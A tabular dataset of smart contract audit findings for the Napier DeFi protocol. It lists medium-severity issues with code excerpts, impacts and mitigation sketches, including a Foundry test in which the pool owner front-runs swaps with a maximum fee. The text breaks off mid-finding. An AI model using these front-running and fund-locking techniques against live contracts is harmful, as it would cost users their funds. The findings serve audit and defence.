Columns: name (string, 5–231 chars) · severity (string class, 3 values) · description (string, 107–68.2k chars) · recommendation (string, 12–8.75k chars) · impact (string, 3–11.2k chars) · function (string, 15–64.6k chars)
Permissioned rebalancing functions leading to loss of assets
medium
Permissioned rebalancing functions that can only be accessed by the admin can lead to a loss of assets.\\nPer the contest's README page, the admin/owner is "RESTRICTED". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's funds to be stuck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe following describes a way the admin can block users from withdrawing their assets from the protocol.\\nThe admin calls the `setRebalancer` function to set the rebalancer to a wallet address they own.\\n```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n\\nThe admin calls the `setTargetBufferPercentage` function to set the `targetBufferPercentage` to the smallest possible value of 1%. This will cause only 1% of the total ETH deposited by all the users to reside in the adaptor contract. This will cause the ETH buffer to deplete quickly and cause all redemptions and withdrawals to revert.\\n```\\nFile: BaseLSTAdapter.sol\\n function setTargetBufferPercentage(uint256 _targetBufferPercentage) external onlyRebalancer {\\n if (_targetBufferPercentage < MIN_BUFFER_PERCENTAGE || _targetBufferPercentage > BUFFER_PERCENTAGE_PRECISION) {\\n revert InvalidBufferPercentage();\\n }\\n targetBufferPercentage = _targetBufferPercentage;\\n }\\n```\\n\\nThe owner calls the `setRebalancer` function again and sets the rebalancer address to `address(0)`. As such, no one can call the functions that are only accessible by the rebalancer. The `requestWithdrawal` and `requestWithdrawalAll` functions are only accessible by the rebalancer, so no one can call these two functions to replenish the ETH buffer in the adaptor contract.\\nWhen this state is reached, users can no longer withdraw their assets from the protocol, and their assets are stuck in the contract. This effectively causes them to lose their assets.
To prevent the above scenario, the minimum `targetBufferPercentage` should be set to a higher percentage such as 5% or 10%, and the `requestWithdrawal` function should be made permissionless, so that even if the rebalancer does not do its job, anyone else can still initiate the rebalancing process to replenish the adaptor's ETH buffer for users' withdrawals.
Loss of assets for the victim.
```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n
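A minimal sketch of the mitigation suggested above, assuming a `totalAssets()` accounting hook and an internal `_requestWithdrawal()` hook (both hypothetical) on top of storage names borrowed from `BaseLSTAdapter`: the buffer floor is raised to 5% and anyone may trigger a withdrawal request once the buffer falls below target.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// @dev Sketch only: storage names mirror BaseLSTAdapter, but the accounting hooks are assumed.
abstract contract PermissionlessRebalanceSketch {
    uint256 internal constant BUFFER_PERCENTAGE_PRECISION = 1e18;
    uint256 internal constant MIN_BUFFER_PERCENTAGE = 5e16; // 5% floor, raised from 1%

    uint256 public targetBufferPercentage;
    uint128 public bufferEth;

    error InvalidBufferPercentage();

    function setTargetBufferPercentage(uint256 newPercentage) external virtual /* onlyRebalancer */ {
        if (newPercentage < MIN_BUFFER_PERCENTAGE || newPercentage > BUFFER_PERCENTAGE_PRECISION) {
            revert InvalidBufferPercentage();
        }
        targetBufferPercentage = newPercentage;
    }

    /// @notice Permissionless: anyone may start a withdrawal request once the buffer drops below target,
    /// so an absent or malicious rebalancer cannot block redemptions indefinitely.
    function requestWithdrawal() external {
        uint256 targetBufferEth = (totalAssets() * targetBufferPercentage) / BUFFER_PERCENTAGE_PRECISION;
        require(bufferEth < targetBufferEth, "buffer already at target");
        _requestWithdrawal(targetBufferEth - bufferEth);
    }

    // Hooks assumed to exist in the concrete adapter.
    function totalAssets() public view virtual returns (uint256);
    function _requestWithdrawal(uint256 withdrawAmount) internal virtual;
}
```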
Unable to deposit to Tranche/Adaptor under certain conditions
medium
Minting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate.\\nThe user cannot deposit into the Tranche to issue new PT + YT under certain conditions.\\nThe comment on Line 133 below mentions that the `stakeAmount` can be zero.\\nThe reason is that when `targetBufferEth < (availableEth + queueEthCache)`, it is possible that there is a pending withdrawal request (queueEthCache) and no available ETH left in the buffer (availableEth = 0). Refer to the comment on Line 123 below.\\nAs a result, the code at Line 127 below will restrict the amount of ETH to be staked and set the `stakeAmount` to zero.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n\\nHowever, when the `_stake` function is called with `stakeAmount` set to zero, zero ETH will be staked and Line 77 below will revert.\\n```\\nFile: StEtherAdapter.sol\\n /// @inheritdoc BaseLSTAdapter\\n /// @dev Lido has a limit on the amount of ETH that can be staked.\\n /// @dev Need to check the current staking limit before staking to prevent DoS.\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n }\\n```\\n\\nA similar issue occurs for the sFRXETH adaptor. If the `FRXETH_MINTER.submit` function is called with `stakeAmount == 0`, it will revert.\\n```\\nFile: SFrxETHAdapter.sol\\n /// @notice Mint sfrxETH using WETH\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n }\\n```\\n\\nThe following shows that the `FRXETH_MINTER.submit` function reverts if the submitted ETH amount is zero.\\n```\\n/// @notice Mint frxETH to the recipient using sender's funds. 
Internal portion\\nfunction _submit(address recipient) internal nonReentrant {\\n // Initial pause and value checks\\n require(!submitPaused, "Submit is paused");\\n require(msg.value != 0, "Cannot submit 0");\\n```\\n
Short-circuit the `_stake` function by returning zero value immediately if the `stakeAmount` is zero.\\nFile: StEtherAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n}\\n```\\n\\nFile: SFrxETHAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n}\\n```\\n
Users cannot deposit into the Tranche to issue new PT + YT under certain conditions. Since minting PT and YT is the core feature of the protocol, this breaks core protocol/contract functionality.
```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n
Napier pool owner can unfairly increase protocol fees on swaps to earn more revenue
medium
There is currently no limit on how often a `poolOwner` can update fees, which can be abused to charge users higher swap fees than they expect.\\nThe `NapierPool::setFeeParameter` function allows the `poolOwner` to set the `protocolFeePercent` at any point to a maximum value of 100%. The `poolOwner` is a trusted party but should not be able to abuse protocol settings to earn more revenue. There are no limits to how often this can be updated.\\n```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter("protocolFeePercent", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, "fee should be charged");\\n }\\n```\\n
Introduce a delay in fee updates to ensure users are charged the fees they expect.
A malicious `poolOwner` could unfairly change the protocol swap fees by front-running swaps and raising fees on unsuspecting users. An example scenario:\\nThe `poolOwner` sets swap fees to 1% to attract users\\nThe `poolOwner` front-runs all swaps and changes the swap fees to the maximum value of 100%\\nAfter the swap, the `poolOwner` resets `protocolFeePercent` to a low value to attract more users
```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter("protocolFeePercent", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, "fee should be charged");\\n }\\n```\\n
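A hedged sketch of the recommended delay, assuming a two-step `scheduleFeeChange`/`applyFeeChange` pattern (the names, the 2-day delay, and the 80% cap are hypothetical, not Napier's API) layered over the existing `protocolFeePercent` storage:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// @dev Illustrative only: the pool's real storage and access control are assumed, not copied.
abstract contract TimelockedFeeSketch {
    uint256 public constant FEE_UPDATE_DELAY = 2 days;      // assumed delay
    uint256 public constant MAX_PROTOCOL_FEE_PERCENT = 80;  // assumed cap below 100%

    uint256 public protocolFeePercent;
    uint256 public pendingProtocolFeePercent;
    uint256 public feeEffectiveAt;

    event FeeChangeScheduled(uint256 newFee, uint256 effectiveAt);
    event FeeChangeApplied(uint256 newFee);

    /// @notice Step 1: the owner announces the new fee; swappers see it on-chain before it applies.
    function scheduleFeeChange(uint256 newFee) external virtual /* onlyOwner */ {
        require(newFee <= MAX_PROTOCOL_FEE_PERCENT, "fee too high");
        pendingProtocolFeePercent = newFee;
        feeEffectiveAt = block.timestamp + FEE_UPDATE_DELAY;
        emit FeeChangeScheduled(newFee, feeEffectiveAt);
    }

    /// @notice Step 2: anyone may apply the change once the delay has elapsed.
    function applyFeeChange() external {
        require(feeEffectiveAt != 0 && block.timestamp >= feeEffectiveAt, "delay not elapsed");
        protocolFeePercent = pendingProtocolFeePercent;
        feeEffectiveAt = 0;
        emit FeeChangeApplied(protocolFeePercent);
    }
}
```

With this shape, a fee increase is visible on-chain for the full delay window, so the front-running scenario above no longer works against in-flight swaps.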
Benign esfrxETH holders incur more loss than expected
medium
Malicious esfrxETH holders can avoid "pro-rated" loss and have the remaining esfrxETH holders incur all the loss due to the fee charged by FRAX during unstaking. As a result, the rest of the esfrxETH holders incur more losses than they would have if malicious esfrxETH holders had not used this trick in the first place.\\n```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n\\nIn the SFrxETHAdapter's comments above, it is stated that the share price will decrease due to the fee taken by FRAX during the withdrawal request. This loss is supposed to be 'pro-rated' among all esfrxETH holders. However, this report reveals that malicious esfrxETH holders can circumvent this 'pro-rated' loss, leaving the remaining esfrxETH holders to bear the entire loss. Furthermore, the report demonstrates that the current mitigation measure, which allows only authorized rebalancers to request withdrawals, is insufficient to prevent this exploitation.\\nWhenever a rebalancer submits a withdrawal request to withdraw staked ETH from FRAX, the transaction will first reside in the mempool, where anyone can see it. Malicious esfrxETH holders can front-run it to withdraw their shares from the adaptor.\\nWhen the withdrawal request TX is executed, the remaining esfrxETH holders in the adaptor will incur the fee. Once it is executed, the malicious esfrxETH holders deposit back into the adaptor.\\nNote that no fee is charged to the users for any deposit or withdrawal operation. Thus, as long as the gain from this action is more than the gas cost, it makes sense for the esfrxETH holders to do so.
The best way to discourage users from withdrawing their assets and depositing them back to take advantage of a particular event is to impose a fee on deposits and withdrawals.
The rest of the esfrxETH holders incur more losses than they would have if malicious esfrxETH holders had not used this trick in the first place.
```\\nFile: SFrxETHAdapter.sol\\n/// @title SFrxETHAdapter - esfrxETH\\n/// @dev Important security note:\\n/// 1. The vault share price (esfrxETH / WETH) increases as sfrxETH accrues staking rewards.\\n/// However, the share price decreases when frxETH (sfrxETH) is withdrawn.\\n/// Withdrawals are processed by the FraxEther redemption queue contract.\\n/// Frax takes a fee at the time of withdrawal requests, which temporarily reduces the share price.\\n/// This loss is pro-rated among all esfrxETH holders.\\n/// As a mitigation measure, we allow only authorized rebalancers to request withdrawals.\\n///\\n/// 2. This contract doesn't independently keep track of the sfrxETH balance, so it is possible\\n/// for an attacker to directly transfer sfrxETH to this contract, increase the share price.\\ncontract SFrxETHAdapter is BaseLSTAdapter, IERC721Receiver {\\n```\\n
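One possible shape of the suggested mitigation: a small exit fee that stays in the vault and accrues to the remaining holders, so hopping out and back in around a known loss event is no longer free. The ERC4626-style `previewRedeem` hook and the 0.1% figure are assumptions, not the Napier design.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// @dev Sketch: an exit fee retained by the vault, accruing to the holders who stay.
abstract contract ExitFeeSketch {
    uint256 internal constant EXIT_FEE_BPS = 10;   // assumed 0.1% exit fee
    uint256 internal constant MAX_BPS = 10_000;

    /// @dev Assumed ERC4626-style conversion provided by the concrete adapter.
    function previewRedeem(uint256 shares) public view virtual returns (uint256 assets);

    /// @notice Assets actually paid out to the redeemer; the fee stays in the vault,
    /// so front-running a withdrawal request and re-depositing is no longer costless.
    function previewRedeemAfterFee(uint256 shares) public view returns (uint256) {
        uint256 assets = previewRedeem(shares);
        return assets - (assets * EXIT_FEE_BPS) / MAX_BPS;
    }
}
```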
Lack of slippage control for `issue` function
medium
The lack of slippage control for the `issue` function can lead to a loss of assets for the affected users.\\nDuring the issuance, the user will deposit underlying assets (e.g., ETH) to the Tranche contract, and the Tranche contract will forward them to the Adaptor contract for depositing at Line 208 below. The number of shares minted depends on the current scale of the adaptor. The current scale of the adaptor can increase or decrease at any time, depending on the current on-chain condition when the transaction is executed. For instance, Lido's daily oracle/rebase update will increase the stETH balance, which will, in turn, increase the adaptor's scale. On the other hand, if there is a mass validator slashing event, the ETH claimed from the withdrawal queue will be less than expected, leading to a decrease in the adaptor's scale. Thus, one cannot ensure the result from the off-chain simulation will be the same as the on-chain execution.\\nHaving said that, the number of shares minted will vary (larger or smaller than expected) if there is a change in the current scale. Assume that Alice determined off-chain that depositing 100 ETH would issue $x$ amount of PT/YT. When she executes the TX, the scale increases, leading to the amount of PT/YT issued being less than $x$. The slippage is more than what she can accept.\\nIn summary, the `issue` function lacks a slippage control that allows users to revert if the amount of PT/YT they receive is less than the amount they expect.\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n
Implement a slippage control that allows users to revert the transaction if the amount of PT/YT they receive is less than the amount they expect.
Loss of assets for the affected users.
```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n // Transfer underlying from user to adapter and deposit it into adapter to get target token\\n _underlying.safeTransferFrom(msg.sender, address(adapter), underlyingAmount);\\n (, uint256 sharesMinted) = adapter.prefundedDeposit();\\n\\n // Deduct the issuance fee from the amount of target token minted + reinvested yield\\n // Fee should be rounded up towards the protocol (against the user) so that issued principal is rounded down\\n // Hackmd: F0\\n // ptIssued\\n // = (u/s + y - fee) * S\\n // = (sharesUsed - fee) * S\\n // where u = underlyingAmount, s = current scale, y = reinvested yield, S = maxscale\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n\\n emit Issue(msg.sender, to, issued, sharesUsed);\\n }\\n\\n```\\n
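A minimal illustration of the recommended slippage guard, assuming an added `minIssued` parameter (hypothetical) on top of the existing issuance flow, which is hidden behind an abstract `_issue()` here:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

/// @dev Sketch only: the real Tranche accounting is hidden behind _issue().
abstract contract SlippageGuardedIssueSketch {
    error InsufficientIssued(uint256 issued, uint256 minIssued);

    function _issue(address to, uint256 underlyingAmount) internal virtual returns (uint256 issued);

    /// @notice Reverts if fewer PT/YT are issued than the caller is willing to accept.
    function issue(address to, uint256 underlyingAmount, uint256 minIssued) external returns (uint256 issued) {
        issued = _issue(to, underlyingAmount);
        if (issued < minIssued) revert InsufficientIssued(issued, minIssued);
    }
}
```

The caller computes `minIssued` off-chain from the expected scale minus an acceptable tolerance, mirroring the `amountOutMin` pattern used by AMM routers.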
Users unable to withdraw their funds due to FRAX admin action
medium
FRAX admin action can lead to the funds of the Napier protocol and its users being stuck, resulting in users being unable to withdraw their assets.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered "RESTRICTED". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? RESTRICTED\\nWhen the Adaptor needs to unstake its staked ETH to replenish its ETH buffer so that users can redeem/withdraw their funds, it will first join FRAX's redemption queue, and the queue will issue a redemption NFT afterward. After a certain period, the adaptor can claim its ETH by burning the redemption NFT at Line 65 via the `burnRedemptionTicketNft` function.\\n```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n\\nHowever, it is possible for FRAX's admin to disrupt the redemption process of the adaptor, resulting in Napier users being unable to withdraw their funds. When the `burnRedemptionTicketNft` function is executed, the redemption NFT will be burned, and native ETH residing in the `FraxEtherRedemptionQueue` contract will be sent to the adaptor at Line 498 below.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function burnRedemptionTicketNft(uint256 _nftId, address payable _recipient) external nonReentrant {\\n..SNIP..\\n // Effects: Burn frxEth to match the amount of ether sent to user 1:1\\n FRX_ETH.burn(_redemptionQueueItem.amount);\\n\\n // Interactions: Transfer ETH to recipient, minus the fee\\n (bool _success, ) = _recipient.call{ value: _redemptionQueueItem.amount }("");\\n if (!_success) revert InvalidEthTransfer();\\n```\\n\\nThe FRAX admin could execute the `recoverEther` function to transfer out all the native ETH residing in the `FraxEtherRedemptionQueue` contract, resulting in the NFT redemption failing due to lack of ETH.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Recover ETH from exits where people early exited their NFT for frxETH, or when someone mistakenly directly sends ETH here\\n /// @param _amount Amount of ETH to recover\\n function recoverEther(uint256 _amount) external {\\n _requireSenderIsTimelock();\\n\\n (bool _success, ) = address(msg.sender).call{ value: _amount }("");\\n if (!_success) revert InvalidEthTransfer();\\n\\n emit RecoverEther({ recipient: msg.sender, amount: _amount });\\n }\\n```\\n\\nAs a result, Napier users will not be able to withdraw their funds.
Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.
The funds of the Napier protocol and its users will be stuck, resulting in users being unable to withdraw their assets.
```\\nFile: SFrxETHAdapter.sol\\n function claimWithdrawal() external override {\\n uint256 _requestId = requestId;\\n uint256 _withdrawalQueueEth = withdrawalQueueEth;\\n if (_requestId == 0) revert NoPendingWithdrawal();\\n\\n /// WRITE ///\\n delete withdrawalQueueEth;\\n delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n
Users are unable to collect their yield if tranche is paused
medium
Users are unable to collect their yield if the Tranche is paused, resulting in a loss of assets for the victims.\\nPer the contest's README page, the admin/owner is "RESTRICTED". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's funds to be stuck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe admin of the protocol has the ability to pause the Tranche contract, and no one except for the admin can unpause it. If a malicious admin pauses the Tranche contract, users will not be able to collect their earned yield, leading to a loss of assets for them.\\n```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n\\nThe following shows that the `collect` function can only be executed when the system is not paused.\\n```\\nFile: Tranche.sol\\n function collect() public nonReentrant whenNotPaused returns (uint256) {\\n uint256 _lscale = lscales[msg.sender];\\n uint256 accruedInTarget = unclaimedYields[msg.sender];\\n```\\n
Consider allowing the users to collect yield even when the system is paused.
Users are unable to collect their yield if the Tranche is paused, resulting in a loss of assets for the victims.
```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n
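A sketch of the recommendation, assuming OpenZeppelin v4's `Pausable` (the `security/Pausable.sol` path) and hypothetical `_issue`/`_collect` hooks: issuance stays pausable, while yield collection runs regardless of the pause state.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import {Pausable} from "@openzeppelin/contracts/security/Pausable.sol";

/// @dev Sketch: yield collection stays live even while new issuance is paused.
abstract contract CollectWhilePausedSketch is Pausable {
    /// @notice Issuance can still be paused by management.
    function issue(address to, uint256 underlyingAmount) external whenNotPaused returns (uint256) {
        return _issue(to, underlyingAmount);
    }

    /// @notice Intentionally NOT gated by whenNotPaused so users can always claim accrued yield.
    function collect() external returns (uint256) {
        return _collect(msg.sender);
    }

    function _issue(address to, uint256 underlyingAmount) internal virtual returns (uint256);
    function _collect(address account) internal virtual returns (uint256);
}
```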
`swapUnderlyingForYt` revert due to rounding issues
medium
The core function (swapUnderlyingForYt) of the Router will revert due to rounding issues. Users who intend to swap underlying assets to YT tokens via the Router will be unable to do so.\\nThe `swapUnderlyingForYt` function allows users to swap underlying assets for a specific number of YT tokens they desire.\\n```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n\\nLines 353-354 above compute the amount of underlying that needs to be sent to the Tranche to issue the amount of YT tokens the user desires. It attempts to add a 0.01 bps buffer to prevent rounding errors that could lead to insufficient PT being repaid to the pool and result in a revert. During the audit, it was found that this buffer is ineffective in achieving its purpose.\\nThe following example/POC demonstrates that a revert could still occur due to insufficient PT being repaid despite having a buffer:\\nLet the state be the following:\\ncscale = 1.2e18\\nmaxScale = 1.25e18\\nytOutDesired = 123\\nissuanceFee = 0% (For simplicity's sake, the fee is set to zero. Having a fee or not does not affect the validity of this issue as this is a math problem)\\nThe following computes the number of underlying assets to be transferred to the Tranche to mint/issue PY + YT:\\n```\\nuDepositNoFee = 